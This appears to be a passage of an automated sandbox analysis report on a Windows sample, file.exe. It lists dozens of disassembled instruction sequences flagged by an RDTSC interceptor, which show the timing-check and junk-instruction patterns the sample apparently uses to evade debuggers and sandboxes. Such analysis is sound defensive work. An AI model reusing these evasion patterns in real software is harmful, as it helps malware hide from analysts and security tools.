                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A014 second address: 132A01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A1C3 second address: 132A1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC400504816h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC400504828h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A62A second address: 132A62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A62E second address: 132A634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A634 second address: 132A63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133187C second address: 133189B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC400504824h 0x00000008 jc 00007FC400504816h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13313E2 second address: 13313E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13313E6 second address: 1331408 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC400504816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FC400504823h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13340F8 second address: 1334105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133AB41 second address: 133AB64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007FC400504816h 0x00000014 js 00007FC400504816h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339A3A second address: 1339A4D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC400D80DA6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339A4D second address: 1339A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339BA3 second address: 1339BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339BAB second address: 1339BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FC400504816h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339BB6 second address: 1339BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC400D80DABh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA42C second address: 12EA430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA430 second address: 12EA436 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA436 second address: 12EA4B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504828h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jne 00007FC400504818h 0x00000011 pop esi 0x00000012 nop 0x00000013 call 00007FC400504828h 0x00000018 mov dx, ECA9h 0x0000001c pop ecx 0x0000001d mov ebx, dword ptr [ebp+1248F604h] 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FC400504818h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000015h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d cmc 0x0000003e add eax, ebx 0x00000040 js 00007FC40050481Ch 0x00000046 mov dword ptr [ebp+122D2779h], ebx 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push ebx 0x00000051 pop ebx 0x00000052 pop eax 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339CF2 second address: 1339CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC400D80DA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339E54 second address: 1339E58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339E58 second address: 1339E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC400D80DAAh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339E6A second address: 1339E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC400504816h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339E7F second address: 1339E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339E85 second address: 1339E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339E90 second address: 1339E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339E94 second address: 1339E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133E715 second address: 133E71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133DE1A second address: 133DE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400504825h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133DE37 second address: 133DE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400D80DAAh 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FC400D80DA6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134246A second address: 1342475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1342475 second address: 1342479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1342479 second address: 134247D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134247D second address: 134248D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC400D80DAEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341755 second address: 1341768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Ch 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341A99 second address: 1341A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341C02 second address: 1341C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341D32 second address: 1341D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341EA6 second address: 1341EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jo 00007FC400504816h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13481C4 second address: 13481DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC400D80DB1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134834E second address: 1348366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FC400504818h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1348366 second address: 1348387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400D80DADh 0x00000009 jmp 00007FC400D80DB0h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1348759 second address: 1348765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC400504816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1348765 second address: 134876D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134876D second address: 1348783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC40050481Bh 0x00000009 jo 00007FC400504816h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1348D72 second address: 1348D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1348D76 second address: 1348D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400504823h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC40050481Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1348D9C second address: 1348DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1348DA0 second address: 1348DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349363 second address: 134937E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FC400D80DAFh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349BE8 second address: 1349C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400504825h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC40050481Bh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349ECA second address: 1349ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349ED0 second address: 1349ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134CFA2 second address: 134CFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134CFA8 second address: 134CFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC400504816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D57B second address: 134D586 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D586 second address: 134D5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400504825h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D952 second address: 134D9AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC400D80DB6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FC400D80DB8h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jmp 00007FC400D80DB4h 0x0000001d popad 0x0000001e pushad 0x0000001f jp 00007FC400D80DA6h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13524AF second address: 13524C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 je 00007FC400504816h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FC40050481Ah 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13524C9 second address: 13524FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400D80DB7h 0x00000009 jmp 00007FC400D80DB9h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13580FC second address: 1358103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1358103 second address: 135810B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13583C3 second address: 13583C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13583C7 second address: 13583EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB1h 0x00000007 jmp 00007FC400D80DB3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1358763 second address: 1358767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1358767 second address: 135876D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13588B3 second address: 13588B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13588B9 second address: 13588BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13588BD second address: 13588C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13588C1 second address: 13588D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FC400D80DACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13588D3 second address: 13588D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1359C91 second address: 1359C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1359C95 second address: 1359CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC400504816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FC40050481Fh 0x00000012 jno 00007FC400504816h 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1359CB8 second address: 1359CDF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FC400D80DA6h 0x00000009 pop esi 0x0000000a jmp 00007FC400D80DB2h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 jc 00007FC400D80DACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13579E0 second address: 13579E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13579E4 second address: 13579EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13579EA second address: 13579F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13579F0 second address: 13579F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13579F6 second address: 13579FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13579FC second address: 1357A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357A00 second address: 1357A1C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC400504816h 0x00000008 js 00007FC400504816h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 pushad 0x00000014 jns 00007FC400504816h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357A1C second address: 1357A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC400D80DA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC400D80DB8h 0x00000012 jmp 00007FC400D80DB0h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F290 second address: 135F2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC400504824h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F2AA second address: 135F2AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13653E3 second address: 13653ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC400504816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A61BB second address: 12A61BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372163 second address: 1372169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372169 second address: 137216D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137216D second address: 1372173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376A8D second address: 1376A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376A95 second address: 1376ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400504823h 0x00000009 jmp 00007FC400504822h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC400504827h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376ADA second address: 1376AE4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC400D80DACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13765D3 second address: 13765E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504820h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13765E9 second address: 13765ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13765ED second address: 13765F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13765F1 second address: 137660A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC400D80DADh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137EB20 second address: 137EB43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504829h 0x00000007 jg 00007FC40050481Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383BCF second address: 1383BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383BD5 second address: 1383BE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jc 00007FC400504835h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
